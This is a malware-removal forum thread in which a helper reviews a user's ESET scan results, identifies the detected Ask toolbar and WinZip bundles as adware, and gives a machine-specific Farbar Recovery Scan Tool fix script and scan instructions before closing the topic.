C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AskToolbarInstaller-BTR-V7[1].7z	a variant of Win32/Bundled.Toolbar.Ask.M potentially unsafe application
D:\AP\WinZip\winzip175mul-32.msi	a variant of Win32/Systweak.L potentially unwanted application
D:\AP\WinZip\winzip175mul-64.msi	a variant of Win32/Systweak.L potentially unwanted application

There you go, and the first name's Simon btw ^^ forgot to tell in my previous reply. The eset log came up with some concerning results, do i have a trojan of some sorts?

 

One more thing id like to point out, ive bough malwarebytes since i started this post and it keeps coming with warnings about firefox.exe, i checked the network exceptions whitelist and it was filled with these ad sites, i removed them all and it seems to block 50% of the ads poping up.


Edited by swaykeb00b, 27 December 2015 - 11:53 AM.


#6 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 4,114 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:10:14 PM

Posted 28 December 2015 - 03:08 PM

Hey Simon, nice to meet you. :)

 

The eset log came up with some concerning results, do i have a trojan of some sorts?

Just some Adware, nothing to worry about. ;)

 

One more thing id like to point out, ive bough malwarebytes since i started this post and it keeps coming with warnings about firefox.exe, i checked the network exceptions whitelist and it was filled with these ad sites, i removed them all and it seems to block 50% of the ads poping up.

Could you explain that in detail please. 

 

STEP 1

xlK5Hdb.png Farbar Recovery Scan Tool (FRST) Script

  • Press the Windows Key pdKOQKY.png + r on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire contents of the codebox below and paste into the Notepad document.
    start
    CreateRestorePoint:C:\Users\Simon\AppData\LocalLow\Sun\Java\jre1.7.0_67\java_sp.dll    
    C:\Users\Simon\Desktop\showbox.apk
    C:\Users\Simon\Desktop\root\files\libexploit.so    
    C:\Windows\Installer\MSIE74.tmp   
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AskToolbarInstaller-BTR-V7[1].7z    unsafe application
    D:\AP\WinZip\winzip175mul-32.msi   
    D:\AP\WinZip\winzip175mul-64.msi EmptyTemp:
    end
  • Click FileSave As and type fixlist.txt as the File Name
  • Important: The file must be saved in the same location as FRST64.exe. 

NOTICE: This script is intended for use on this particular machine. Do not use this script on any other machine; doing so may cause damage to your Operating System.

  • Right-Click FRST64.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Click Fix.
  • A log (Fixlog.txt) will open on your desktop. Copy the contents of the log and paste in your next reply.

STEP 2
xlK5Hdb.png Farbar Recovery Scan Tool (FRST) Scan

  • Right-Click FRST.exe or FRST64.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the programme run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply. 

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.

unite_blue.png
 
 


#7 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 4,114 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:10:14 PM

Posted 07 January 2016 - 11:01 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.

unite_blue.png
 
 





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users